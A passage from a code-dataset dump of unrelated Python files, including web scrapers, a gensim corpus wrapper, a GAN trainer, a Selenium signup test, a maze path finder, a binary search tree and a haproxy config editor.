title=re.compile('[1-5]\\.[0-5] out of 5 stars'))['title']\n review.rating = float(rating_text[:3])\n\n return review\n\ndef get_rank(html):\n \"\"\"\n Parses a profile object based on an html string\n :param html: A string containing the html of a profile page\n :return: A profile object\n \"\"\"\n dom = bs4.BeautifulSoup(html, 'html.parser')\n bio = _select(dom, '.bio-expander', important=False)\n if bio:\n return int(_find(bio, text=re.compile('#' + num_format))[1:].replace(',', ''))\n else:\n return None\n\n\ndef get_product(xml):\n \"\"\"\n Parses a product object based on an xml string\n :param xml: A string containing the xml of an amazon response for a product\n :return: A product object\n \"\"\"\n dom = bs4.BeautifulSoup(xml, 'html.parser')\n xml = _select(dom, 'itemlookupresponse > items > item')\n product = models.Product(id=_select(xml, 'asin').text)\n\n product.title = _select(xml, 'itemattributes > title').string\n product.product_url = _select(xml, 'detailpageurl').string\n product.reviews_url = _select(xml, 'customerreviews > iframeurl').string\n product.retrieval_date = datetime.datetime.today()\n product.category = _select(xml, 'itemattributes > productgroup').string\n\n # concatenate all description data\n features = _select_all(xml, 'itemattributes > feature')\n product.description = '. '.join([feature.string for feature in features]) + '. '\n for editorial_review in _select_all(xml, 'editorialreviews > editorialreview'):\n if editorial_review.source.string == 'Product Description':\n product.description += editorial_review.content.string\n\n return product\n","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":5399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"251937676","text":"'''\nRewriting of gensim.corpora.wikicorpus.py where Wikipedia\nis a json.gz file. Each line of the json file is a\nWikipedia page in the format:\n\n {\n 'wikiTitle': str\n 'wikiId': int\n 'sentences': [str]\n }\n\nFurthermore, tokenize and lemmatize and process_article functions are changed\nby removing some processing (our Wikipedia dump is already cleaned).\n'''\n\n# Copyright (C) 2010 Radim Rehurek \n# Copyright (C) 2012 Lars Buitinck \n# Licensed under the GNU LGPL v2.1 - http://www.gnu.org/licenses/lgpl.html\n\nfrom gensim.corpora import wikicorpus\nfrom gensim import utils\n\nimport re\nimport gzip\nimport multiprocessing\nimport json\nimport logging\n\nfrom pattern.en import parse\n\nfrom latent_utils import extract_json_pages\nfrom latent_utils import LEMMING\n\n\nlogger = logging.getLogger('JsonWikiCorpus')\n\n\ndef tokenize(text, lowercase=False, deacc=False, errors=\"strict\", to_lower=False, lower=False):\n # In wikipedia-w2v-linkCorpus.json.gz text is already tokenized by spaces.\n\n # remove numbers and co.\n regexped = {match.group() for match in utils.PAT_ALPHABETIC.finditer(text)}\n\n # alwatys keep ent_wikiID tokens.\n return [word for word in text.split(' ')\n if word.startswith('ent_') or word in regexped]\n\n\ndef lemmatize(content, allowed_tags=re.compile('(NN|VB|JJ|RB)'), light=False,\n stopwords=frozenset(), min_length=2, max_length=15):\n '''\n Lemmatizes content where ent_wiki_ids are never removed. \n '''\n content = (' ').join(tokenize(content, lower=True, errors='ignore'))\n\n parsed = parse(content, lemmata=True, collapse=False)\n result = []\n for sentence in parsed:\n for token, tag, _, _, lemma in sentence:\n\n if lemma.startswith('ent_') and lemma not in stopwords:\n # Wikipedia entity\n result.append(lemma.encode('utf8'))\n continue\n\n if min_length <= len(lemma) <= max_length and not lemma.startswith('_') and lemma not in stopwords:\n if allowed_tags.match(tag):\n lemma += \"/\" + tag[:2]\n result.append(lemma.encode('utf8'))\n return result\n\n\ndef process_article(args):\n \"\"\"\n Parse a wikipedia article, returning its content as a list of tokens\n (utf8-encoded strings).\n\n @params args (text, to_lemmatize, title, pageid)\n \"\"\"\n text, to_lemmatize, title, pageid = args\n if to_lemmatize:\n result = lemmatize(text)\n else:\n result = tokenize(text)\n\n return result, title, pageid\n\n\nclass JsonWikiCorpus(wikicorpus.WikiCorpus):\n\n def __init__(self, fname, processes=None, to_lemmatize=LEMMING, dictionary=None, filter_namespaces=('0',)):\n self.to_lemmatize = to_lemmatize # avoid confusion between function and variable\n super(JsonWikiCorpus, self).__init__(fname, processes, to_lemmatize, dictionary, filter_namespaces)\n\n def get_texts(self, keep_wiki_ids=None):\n articles, articles_all = 0, 0\n positions, positions_all = 0, 0\n texts = ((text, self.to_lemmatize, title, pageid) for title, text, pageid in extract_json_pages(self.fname, self.filter_namespaces, keep_wiki_ids))\n pool = multiprocessing.Pool(self.processes)\n\n for group in utils.chunkize(texts, chunksize=10 * self.processes, maxsize=1):\n for tokens, title, pageid in pool.imap(process_article, group): # chunksize=10):\n articles_all += 1\n positions_all += len(tokens)\n # article redirects and short stubs are pruned here\n if keep_wiki_ids is None and len(tokens) < wikicorpus.ARTICLE_MIN_WORDS or any(title.startswith(ignore + ':') for ignore in wikicorpus.IGNORED_NAMESPACES):\n continue\n articles += 1\n positions += len(tokens)\n if self.metadata:\n yield (tokens, (pageid, title))\n else:\n yield tokens\n pool.terminate()\n\n logger.info(\n \"finished iterating over Wikipedia corpus of %i documents with %i positions\"\n \" (total %i articles, %i positions before pruning articles shorter than %i words)\",\n articles, positions, articles_all, positions_all, wikicorpus.ARTICLE_MIN_WORDS)\n self.length = articles # cache corpus length\n# endclass WikiCorpus\n","sub_path":"src/main/python/latent/json_wikicorpus.py","file_name":"json_wikicorpus.py","file_ext":"py","file_size_in_byte":4414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"513449039","text":"import time\nimport json\nimport requests\nimport urllib3\nfrom random import randint\nfrom bs4 import BeautifulSoup\nfrom threading import Thread\n\nurllib3.disable_warnings()\nBASE_URL = \"https://jobs.ksl.com/search/posted/last-7-days\"\nHEADERS = {\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36\"\n}\nJOBS = {}\n\n\ndef getJobDescriptions(url, headers):\n\n data = requests.get(url=url, headers=headers, verify=False, timeout=20)\n data.close()\n soup = BeautifulSoup(data.text, \"html.parser\")\n\n descriptionTag = soup.find_all(\n \"meta\", {\"property\": \"og:description\"}, \"html.parser\"\n )\n\n description = descriptionTag[0][\"content\"]\n JOBS[url][\"description\"] = description\n\n\ndef writeToFile():\n global JOBS\n with open(\"sample.json\", \"w\") as outfile:\n json.dump(JOBS, outfile)\n\n\ndef getJobListings(url, headers):\n dataX = requests.get(url=url, headers=headers, verify=False, timeout=20)\n soup = BeautifulSoup(dataX.text, \"html.parser\")\n dataX.close()\n\n script = soup.find_all('script', {'type': 'application/ld+json'})\n content = script[0].contents[0]\n\n jobsArray = json.loads(content)[\"itemListElement\"]\n threads = []\n for job in jobsArray:\n JOBS[job[\"url\"]] = {\n \"name\": job[\"title\"],\n \"employer\": job[\"hiringOrganization\"][\"name\"],\n \"url\": job[\"url\"],\n }\n t = Thread(target=getJobDescriptions, args=(job[\"url\"], headers))\n threads.append(t)\n\n for i in threads:\n i.start()\n\n # Making sure all the jobs description is fetched\n for i in threads:\n i.join()\n\n print(f\"Number of jobs Scraped {len(JOBS)}\")\n\n writeToFile()\n\n next_page = soup.find(\"a\", {\"class\": \"next link\"})\n\n if next_page is not None:\n getJobListings(next_page.get(\"href\"), HEADERS)\n\n\ngetJobListings(BASE_URL, HEADERS)\n","sub_path":"src/ksl.py","file_name":"ksl.py","file_ext":"py","file_size_in_byte":1926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"68042899","text":"import numpy as np\nfrom scipy.misc import imsave\nimport matplotlib.pyplot as plt\n\nfrom batch_generators.batch_generators import TwoClassBatchGenerator\nfrom batch_generators.batch_gen_utils import get_two_classes_celeba, get_anime\nfrom neural_nets.identity_gan import IdentityGan\n\ncrop_size = 100\nlr = .0001\nbatch_size = 16\nwasserstein = False\ng_iters = 1\nd_iters = 1\n\n########################\n# Batch gen\n########################\n\nwomen, men = get_two_classes_celeba('sex')#get_women_UTKFACE()\n\nanime = get_anime()\n\nbatchgen = TwoClassBatchGenerator(file_list_a=women, file_list_b=anime, height=crop_size, width=crop_size)\n\nn, p = batchgen.generate_batch(12)\n\nn = np.concatenate([n[0:6]], axis=0)\nn = n.reshape([crop_size * 6, crop_size, 3])\np = np.concatenate([p[0:6]], axis=0)\np = p.reshape([crop_size * 6, crop_size, 3])\nt = np.concatenate([n, p], axis=1)\n\nplt.imshow(t)\n\n########################\n# Identity gan\n########################\n\ngan = IdentityGan(crop_size=crop_size,\n identity_weight=1,\n wasserstein=wasserstein)\n\ni = 0\nwhile True:\n\n for _ in range(g_iters):\n\n neg_batch, pos_batch = batchgen.generate_batch(batch_size)\n neg_batch, pos_batch = (neg_batch * 2) - 1, (pos_batch * 2) - 1\n\n # train G\n _ = gan.sess.run([gan.g_train_op], feed_dict={gan.input_face: neg_batch})\n\n for _ in range(d_iters):\n\n neg_batch, pos_batch = batchgen.generate_batch(batch_size)\n neg_batch, pos_batch = (neg_batch * 2) - 1, (pos_batch * 2) - 1\n\n # train D\n _ = gan.sess.run([gan.d_train_op], feed_dict={gan.input_face: neg_batch, gan.real: pos_batch})\n\n # if wasserstein:\n # gan.sess.run(gan.clipping_op)\n\n # save sample\n if i % 100 == 0:\n output = gan.sess.run([gan.generator_output],\n feed_dict={gan.input_face: neg_batch[0:1]})\n sample = np.concatenate([neg_batch[0], output[0][0]], axis=0)\n\n sample = sample.reshape(crop_size * 2, crop_size, 3)\n save_path = 'samples/identity_gan_sample_{}.jpg'.format(i)\n imsave(save_path, sample)\n print('Sample saved to {}.'.format(save_path))\n\n # save model\n if i % 10000 == 0:\n save_path = gan.saver.save(gan.sess, 'models/identity_gan_{}.ckpt'.format(i))\n print('Model saved to {}.'.format(save_path))\n\n i += 1\n","sub_path":"train_identity_gan.py","file_name":"train_identity_gan.py","file_ext":"py","file_size_in_byte":2362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"433659725","text":"from time import sleep\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.webdriver.support.ui import Select\nimport sys\n################################################################\n#(number of users)\nN = 2\n#(number of feed per scope) * (number of scope)\nF = 1*3\n#(number of reply per feed)\nR = 2\n#(number of chat)\nC = 1\n################################################################\ndrivers = []\nscopes = ['Public', 'Friend Only', 'Private']\nlikes = ['like', 'dislike']\n################################################################\ndef end_test(message, e):\n print(message)\n print('Exception Message: ', e)\n sys.exit(1)\n\ndef find_by_id(driver, name):\n try:\n ret = driver.find_element_by_id(name)\n except NoSuchElementException as e:\n end_test('find_by_id: Cannot find %s' % name, e)\n sys.exit(1)\n return ret\n\ndef find_or_error(driver, name):\n try:\n driver.find_element_by_id(name)\n except NoSuchElementException:\n return False\n return True\n\ndef send_keys(_element, _key):\n try:\n _element.send_keys(_key + Keys.RETURN)\n except Exception as e:\n end_test('Cannot send %s' % _key ,e)\n sleep(0.5)\n\ndef send(driver, name, _key):\n try:\n _element = find_by_id(driver, name)\n _element.send_keys(_key + Keys.RETURN)\n except Exception as e:\n end_test('Cannot send {0} to {1}'.format(_key, name), e)\n\ndef click(driver, name):\n try:\n _element = find_by_id(driver, name)\n _element.click()\n except Exception as e:\n end_test('Cannot click %s' % name, e)\n sleep(0.5)\n\ndef signup_test(driver, uname, upwd, duplication):\n try:\n click(driver, 'SignUp')\n send(driver, 'input-username', uname)\n send(driver, 'input-password', upwd)\n send(driver, 'input-retypepassword', upwd)\n click(driver, 'SignUp')\n if duplication==True:\n exist = find_or_error(driver, 'login-error-box') and \\\n find_or_error(driver, 'login-error-msg') and \\\n find_or_error(driver, 'login-error-confirm')\n if(not exist):\n print('Duplicated SignUp('+uname+') test failed')\n sys.exit(1)\n click(driver, 'login-error-confirm')\n print('Duplicated SignUp('+uname+') test success')\n else:\n exist = find_or_error(driver, 'login-error-box') or \\\n find_or_error(driver, 'login-error-msg') or \\\n find_or_error(driver, 'login-error-confirm')\n if exist:\n print('SignUp(' + uname + ') test failed')\n sys.exit(1)\n print(uname + ' SignUp success')\n except Exception as e:\n end_test('\\nSignUp test failed', e)\n\n################################################################\nfor i in range(0, 1):\n print('drivers[{0}] open'.format(i))\n drivers.append(webdriver.Chrome('/usr/local/bin/chromedriver'))\n #drivers[i].get('http://localhost:3000')\n drivers[i].get('http://13.124.80.116:3000')\n print('drivers[{0}] open successful'.format(i))\n\n\n################################################################\nprint('\\nSignUp test:')\n\nfor i in range(0, N):\n uname = 'user{0}'.format(i)\n upwd = 'user{0}'.format(i)\n signup_test(drivers[0], uname, upwd, False)\n\ndrivers[0].quit()","sub_path":"progress/usercreate_front.py","file_name":"usercreate_front.py","file_ext":"py","file_size_in_byte":3455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"628252379","text":"\"\"\"Path Finder #2: shortest path\n\nYou are at position [0, 0] in maze NxN and you can only move in\none of the four cardinal directions (i.e. North, East, South, West). \nReturn the minimal number of steps to exit position [N-1, N-1] \nif it is possible to reach the exit from the starting position. \nOtherwise, return false in JavaScript/Python.\n\nEmpty positions are marked .. \nWalls are marked W. \nStart and exit positions are guaranteed to be empty in all test cases.\n\"\"\"\n\n\n# Tell variables and constants by the cases they're written.\n# D and WALL will never change: they're constants.\nD = [(0, 1), (0, -1), (1, 0), (-1, 0)]\nWALL = 'W'\n\n# Very simple BFS problem\ndef path_finder(maze):\n maze = maze.split()\n N = len(maze)\n DEST = (N-1, N-1) # Dest won't change in this problem\n distances = [[-1] * N for _ in range(N)]\n distances[0][0] = 0\n queue = [(0, 0)]\n \n while queue:\n r, c = queue.pop(0)\n for dr, dc in D:\n new_r, new_c = r + dr, c + dc\n if 0 <= new_r < N and 0 <= new_c < N \\\n and distances[new_r][new_c] == -1 \\\n and maze[new_r][new_c] != WALL:\n distances[new_r][new_c] = distances[r][c] + 1\n # If we have reached DEST, just return it. No need to move on.\n if (new_r, new_c) == DEST:\n return distances[new_r][new_c]\n queue.append((new_r, new_c))\n \n # If we couldn't reach DEST, return False\n return False\n\n'''\ndef path_finder(s):\n maze = [[1 if p == \".\" else 0 for p in line] for line in s.split(\"\\n\")]\n N = len(maze)\n adj = [[] for _ in range(N*N)]\n for i in range(N):\n for j in range(N):\n if maze[i][j]:\n target = adj[i+j+(N-1)*i]\n if i > 0 and maze[i-1][j] == 1:\n target.append(i-1+j+(N-1)*(i-1))\n if j > 0 and maze[i][j-1] == 1:\n target.append(i+j-1+(N-1)*i)\n if i < N-1 and maze[i+1][j] == 1:\n target.append(i+1+j+(N-1)*(i+1))\n if j < N-1 and maze[i][j+1] == 1:\n target.append(i+j+1+(N-1)*i)\n\n def bfs(adj, start, end):\n N = len(adj)\n distance = [-1] * N\n parent = [-1] * N\n queue = []\n distance[start] = 0\n parent[start] = start\n queue.append(start)\n while queue:\n here = queue.pop(0)\n for i in range(len(adj[here])):\n there = adj[here][i]\n if distance[there] == -1:\n queue.append(there)\n distance[there] = distance[here] + 1\n parent[there] = here\n path = [end]\n while parent[end] != end:\n end = parent[end]\n if end >= 0:\n path.append(end)\n path.reverse()\n return path\n \n path = bfs(adj, 0, len(adj)-1)\n return len(path)-1 if len(path) > 1 else False\n''' \n \n\n\na = \"\\n\".join([\n \".W.\",\n \".W.\",\n \"...\"\n])\n\nb = \"\\n\".join([\n \".W.\",\n \".W.\",\n \"W..\"\n])\n\nc = \"\\n\".join([\n \"......\",\n \"......\",\n \"......\",\n \"......\",\n \"......\",\n \"......\"\n])\n\nd = \"\\n\".join([\n \"......\",\n \"......\",\n \"......\",\n \"......\",\n \".....W\",\n \"....W.\"\n])\n\ndef assert_equals(f, ret):\n if f == ret:\n print(True)\n else:\n print(False)\n\nassert_equals(path_finder(a), 4)\nassert_equals(path_finder(b), False)\nassert_equals(path_finder(c), 10)\nassert_equals(path_finder(d), False)\n","sub_path":"python/codewars/shortest_path.py","file_name":"shortest_path.py","file_ext":"py","file_size_in_byte":3506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"242793561","text":"msg, shift = input().split()\nshift = int(shift)\nif shift < 1 or shift > 26:\n print(\"Error\")\nelse:\n encode = ''\n for char in msg:\n x = ord(char.lower()) - shift\n if x < 97:\n x += 26\n encode += chr(x).upper()\n print(encode)\n","sub_path":"Jeewa/chapter 6/5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"265115708","text":"from requests import get\nfrom bs4 import BeautifulSoup\nimport jsonlines\n\ngenres = [\"action\", \"adventure\", \"animation\", \"biography\", \"comedy\", \"crime\", \"documentary\", \"drama\", \"family\",\n \"fantasy\", \"film_noir\", \"game_show\", \"history\", \"horror\", \"music\", \"musical\", \"mystery\", \"news\",\n \"reality_tv\", \"romance\", \"scifi\", \"sport\", \"talk_show\", \"thriller\", \"war\", \"western\"]\n\nmovies_list = list()\n\nmovie_counter = 0\n\n\ndef start_crawling():\n loop_through_genres()\n\n\ndef loop_through_genres():\n for genre in genres:\n print(\"Exportando arquivo do gênero: \" + genre.upper() + \" no formado JSONL \")\n print(\"------------------------------------------------------\")\n\n loop_through_pages(genre)\n\n\ndef loop_through_pages(genre):\n for page in range(0, 10):\n print(\"Lendo a página: \" + str(page + 1) + \" da seleção de: \" + genre)\n\n imdb_url = \"https://www.imdb.com/search/title?release_date=1500-01-01,2018-12-31&user_rating=1.0,10.0&genres=\"\\\n + str(genre) + \"&sort=user_rating,desc&start=\" + str(movie_counter)\n\n response = get(imdb_url)\n\n next_page()\n\n loop_through_movies(genre, response)\n clear_list_of_movies()\n\n\ndef loop_through_movies(genre, response):\n movies = BeautifulSoup(response.text, 'html.parser')\n for movie in movies.findAll(\"div\", {\"class\": \"lister-item mode-advanced\"}):\n title = movie.a.img[\"alt\"]\n rating = movie.find(\"div\", {\"class\": \"inline-block ratings-imdb-rating\"})\n rating = rating.strong.text\n\n write_jsonl(movies_list, genre, rating, title, genre)\n\n\ndef next_page():\n global movie_counter\n movie_counter += 50\n reset_movie_counter_after_read_all()\n\n\ndef reset_movie_counter_after_read_all():\n global movie_counter\n if movie_counter == 500:\n print(\"------------------------------------------------------\")\n print(\"Total de \" + str(movie_counter) + \" filmes exportados\")\n print(\"------------------------------------------------------\")\n movie_counter = 0\n\n\ndef clear_list_of_movies():\n if movie_counter == 0:\n movies_list.clear()\n\n\ndef write_jsonl(movie_list, genre, rating, title, json_name):\n dict_movies = {'title': title, 'genre': genre, 'rating': rating}\n movie_list.append(dict_movies)\n with jsonlines.open(json_name + '.jsonl', mode='w') as writer:\n writer.write(movie_list)\n\n\nstart_crawling()\n","sub_path":"webcrawling/movies.py","file_name":"movies.py","file_ext":"py","file_size_in_byte":2430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"594184542","text":"dogs = [\n {\n \"name\" : \"Melba\",\n \"handle\" : \"melba\",\n \"bio\" : \"Hi, I'm Melba! I'm a mini-goldendoodle and I love to play.\",\n \"age\" : 3\n },\n {\n \"name\" : \"Charlie\",\n \"handle\" : \"chucky\",\n \"bio\" : \"Hi I'm Charlie! I'm a big white standard poodle.\",\n \"age\" : 7\n },\n {\n \"name\" : \"Rosie\",\n \"handle\" : \"rose\",\n \"bio\" : \"Hi I'm Rosie! I'm from the hard streets of LA, don't mess with me.\",\n \"age\" : 9\n }\n]\n\n# def get_dog_by_handle(handle):\n# for dog in dogs:\n# if dog['handle'] == handle:\n# return dog\n# return None\n\n# posts = [\n# {\n# \"text\" : \"I'm so excited to move to California!\",\n# \"handle\" : \"melba\",\n# \"likes\" : [\"rose\", \"chucky\"],\n# \"id\" : \"1\"\n# },\n# {\n# \"text\" : \"Hung out with @melba!\",\n# \"handle\" : \"rose\",\n# \"likes\" : [\"melba\",\"chucky\"],\n# \"id\" : \"6\"\n# },\n# {\n# \"text\" : \"Great game of fetch today with my Dad, Paul\",\n# \"handle\" : \"melba\",\n# \"likes\" : [\"rose\"],\n# \"id\" : \"2\"\n# },\n \n# {\n# \"text\" : \"Took a great 8 hour nap today, then guarded the household\",\n# \"handle\" : \"chucky\",\n# \"likes\" : [\"rose\"],\n# \"id\" : \"3\"\n# },\n# {\n# \"text\" : \"Peanut butter is my favorite snack!\",\n# \"handle\" : \"melba\",\n# \"likes\" : [\"chucky\"],\n# \"id\" : \"4\"\n# },\n# {\n# \"text\" : \"Today I stole food from a blind dog.\",\n# \"handle\" : \"rose\",\n# \"likes\" : [\"melba\",\"chucky\"],\n# \"id\" : \"5\"\n# }\n \n# ]\n\ndef add_post_url():\n results = []\n for post in posts:\n for dog in dogs:\n sub = \"@\" + dog['Handle']\n print(sub)\n if sub in post['Text']:\n link = '' + sub + ''\n post['Text'] = post['Text'].replace(sub, link) \n results.append(post)\n return results\n\n# def get_posts_by_handle(handle):\n# results = []\n# url_posts = add_post_url()\n# for post in url_posts:\n# if post['handle'] == handle:\n# results.append(post)\n# return results\n\ndef get_post_by_id(id):\n for post in posts:\n if post['id'] == id:\n return post\n return None","sub_path":"fake_data.py","file_name":"fake_data.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"86787613","text":"from colorpicker_test_ui import Ui_Dialog\nfrom colorpicker import ColorpickerDialog\nfrom PyQt5 import QtWidgets, QtCore, QtGui\n\n\nclass ColorpickerTestWindow(Ui_Dialog):\n def __init__(self, dialog):\n super().__init__()\n self.setupUi(dialog)\n\n self.pushButton.clicked.connect(self.pushButton_callback)\n\n def pushButton_callback(self):\n dialog = QtWidgets.QDialog()\n colorpicker = ColorpickerDialog(dialog)\n dialog.exec_()\n print (colorpicker.result_clrstr)","sub_path":"src/colorpicker/colorpicker_test.py","file_name":"colorpicker_test.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"3157627","text":"\"\"\"Created by Connor Murray (connormurray7@gmail.com)\non 08/30/2016.\n\nA simple binary search tree with NO self-balancing.\n\"\"\"\nfrom collections import deque\n\n\nclass BinarySearchTree(object):\n \"\"\"A simple binary search tree with no self-balancing.\"\"\"\n\n class Node(object):\n \"\"\"Node as internal data structure\"\"\"\n def __init__(self, key, val):\n self.key = key\n self.val = val\n self.left = None\n self.right = None\n\n def __init__(self):\n self.head = None\n\n def __getitem__(self, key):\n \"\"\"Operator [] overloaded, O(log n) to get\"\"\"\n return self.get(key)\n\n def __setitem__(self, key, val):\n \"\"\"Operator [] overloaded, O(log n) to set\"\"\"\n self.put(key, val)\n\n def get(self, key):\n \"\"\"Returns the value for the key given O(log n)\"\"\"\n if self.head is None:\n return None\n if self.head.key == key:\n return self.head.val\n cur = self.head\n while cur and cur.key != key:\n if key < cur.key:\n cur = cur.left\n else:\n cur = cur.right\n return None if cur is None else cur.val\n\n def put(self, key, val):\n \"\"\"Constructs a node and places it in the tree O(log n)\"\"\"\n if self.head is None:\n self.head = self.Node(key, val)\n return\n cur = self.head\n while cur:\n last = cur\n if key < cur.key:\n cur = cur.left\n else:\n cur = cur.right\n if key < last.key:\n last.left = self.Node(key, val)\n else:\n last.right = self.Node(key, val)\n\n def __str__(self):\n d = deque()\n d.append(self.head)\n vals = []\n while len(d) > 0:\n cur = d.popleft()\n if cur is not None:\n vals.append(str(cur.val))\n d.append(cur.left)\n d.append(cur.right)\n out_str = ' '.join([val for val in vals])\n return \"BST [\" + out_str + \"]\"\n","sub_path":"python/data_structures/binary_search_tree.py","file_name":"binary_search_tree.py","file_ext":"py","file_size_in_byte":2061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"90122961","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# by cuiyaunrong\n\nimport os\n\nhaproxy_conf_file = \"haproxy.conf\"\nnew_haproxy_conf_file = \"new.conf\"\n\ndef bakfile():\n if os.path.exists(haproxy_conf_file):\n os.system(\"cp haproxy.conf bak/haproxy.conf.`date +'%Y%m%d%H%M%S'`\")\n else:\n print(\"配置文件不存在!!!!\")\n\ndef reset():\n if os.path.exists(haproxy_conf_file):\n os.system(\"cp -a new.conf haproxy.conf\")\n else:\n print(\"配置文件不存在!!!!\")\n\ndef fetch_record(backend):\n result = []\n with open('haproxy.conf', 'r') as f:\n flag = False\n for line in f:\n if line.strip().startswith('backend') and line.strip() == \"backend \" + backend:\n flag = True\n continue\n if flag and line.strip().startswith('backend'):\n break\n if flag and line.strip():\n result.append(line.strip())\n\n return result\n\ndef fetch_backend(backend):\n result = []\n with open('haproxy.conf', 'r') as f:\n flag = False\n for line in f:\n if line.strip().startswith('backend') and line.strip() == \"backend \" + backend:\n flag = True\n result.append(line.strip().split()[1])\n continue\n if flag and line.strip().startswith('backend'):\n break\n if flag and line.strip():\n break\n return result\n\ndef add_record(backend,record):\n result = fetch_record(backend)\n if result not in result:\n result.append(record)\n with open('haproxy.conf', 'r') as old, open('new.conf', 'w') as new:\n continue_flag = False\n for line in old:\n line_str = line.strip()\n if line_str.startswith('backend') and line_str.endswith(backend):\n continue_flag = True\n new.write(line)\n for temp in result:\n new.write(\" \" * 8 + temp + \"\\n\")\n continue\n\n if continue_flag and line_str.startswith('backend'):\n continue_flag = False\n\n if continue_flag:\n pass\n else:\n new.write(line)\n\ndef delete_record(backend,record):\n result = fetch_record(backend)\n if record in result:\n result.remove(record)\n with open('haproxy.conf', 'r') as old, open('new.conf', 'w') as new:\n continue_flag = False\n for line in old:\n line_str = line.strip()\n if line_str.startswith('backend') and line_str.endswith(backend):\n continue_flag = True\n new.write(line)\n for temp in result:\n new.write(\" \" * 8 + temp + \"\\n\")\n continue\n\n if continue_flag and line_str.startswith('backend'):\n continue_flag = False\n\n if continue_flag:\n pass\n else:\n new.write(line)\n\ndef update_record(backend,old_record,new_record):\n result = fetch_record(backend)\n if old_record in result:\n result.remove(old_record)\n result.append(new_record)\n with open('haproxy.conf', 'r') as old, open('new.conf', 'w') as new:\n continue_flag = False\n for line in old:\n line_str = line.strip()\n if line_str.startswith('backend') and line_str.endswith(backend):\n continue_flag = True\n new.write(line)\n for temp in result:\n new.write(\" \" * 8 + temp + \"\\n\")\n continue\n\n if continue_flag and line_str.startswith('backend'):\n continue_flag = False\n\n if continue_flag:\n pass\n else:\n new.write(line)\n\ndef add_backend(backend):\n result = fetch_backend(backend)\n if backend not in result:\n with open('haproxy.conf', 'r') as old, open('new.conf', 'w') as new:\n for line in old:\n new.write(line)\n new.write(\"\\nbackend \" + backend)\n\ndef delete_backend(backend):\n result = fetch_backend(backend)\n if backend in result:\n with open('haproxy.conf', 'r') as old, open('new.conf', 'w') as new:\n continue_flag = False\n for line in old:\n line_str = line.strip()\n if line_str.startswith('backend') and line_str.endswith(backend):\n continue_flag = True\n continue\n\n if continue_flag and line_str.startswith('backend'):\n continue_flag = False\n\n if continue_flag:\n pass\n else:\n new.write(line)\n\n\n# ret = fetch_record('www.oldboy.org')\n# print(ret)\n# add_record('www.xiaocui.org','aaaaaaaaaaaaaa')\n# delete_record('www.oldboy.org','server 100.1.7.9 weight 20 maxconn 3000')\n# update_record('www.oldboy.org','server 100.1.7.9 weight 20 maxconn 3000','server 100.1.7.9 weight 20 maxconn 1000')\n# ret = fetch_backend('www.oldboy.org')\n# print(ret)\n# add_backend('www.doumi.com')\n# delete_backend('www.xiaocui.org')\n\ndef main():\n while True:\n print(\"=\" * 50)\n wel = \"\"\"\n 欢迎使用haproxy配置文件编辑工具。\n 1、查询backend\n 2、添加backend\n 3、删除backend\n 4、查询backend记录\n 5、添加backend记录\n 6、删除backend记录\n 7、更新backend记录\n 8、退出\n \"\"\"\n print(wel)\n print(\"=\" * 50)\n input_str = input(\"请输入上面操作对应的数字: \")\n\n if input_str == '1':\n backend = input(\"请输入backend名称:\")\n ret = fetch_backend(backend)\n print(ret)\n elif input_str == '2':\n bakfile()\n backend = input(\"请输入backend名称:\")\n add_backend(backend)\n reset()\n elif input_str == '3':\n bakfile()\n backend = input(\"请输入backend名称:\")\n delete_backend(backend)\n reset()\n elif input_str == '4':\n backend = input(\"请输入backend名称:\")\n ret = fetch_record(backend)\n print(ret)\n elif input_str == '5':\n bakfile()\n backend = input(\"请输入backend名称:\")\n record = input(\"请输入记录:\")\n add_record(backend, record)\n reset()\n elif input_str == '6':\n bakfile()\n backend = input(\"请输入backend名称:\")\n record = input(\"请输入记录:\")\n delete_record(backend,record)\n reset()\n elif input_str == '7':\n bakfile()\n backend = input(\"请输入backend名称:\")\n old_record = input(\"请输入老记录:\")\n new_record = input(\"请输入新纪录:\")\n update_record(backend, old_record, new_record)\n reset()\n elif input_str == '8':\n exit()\n else:\n print(\"输入错误,请重新输入。\")\n\nmain()","sub_path":"week03/Modify_haproxy_conf.py","file_name":"Modify_haproxy_conf.py","file_ext":"py","file_size_in_byte":7255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"581235363","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport sorl.thumbnail.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Card',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=200)),\n ('state', models.IntegerField(default=False, choices=[(0, b'For Sale'), (1, b'Sold'), (2, b'Not for Sale')])),\n ('image', sorl.thumbnail.fields.ImageField(upload_to=b'squigcard/cards/')),\n ('price', models.IntegerField(help_text=b'No currency required.', null=True, blank=True)),\n ('description', 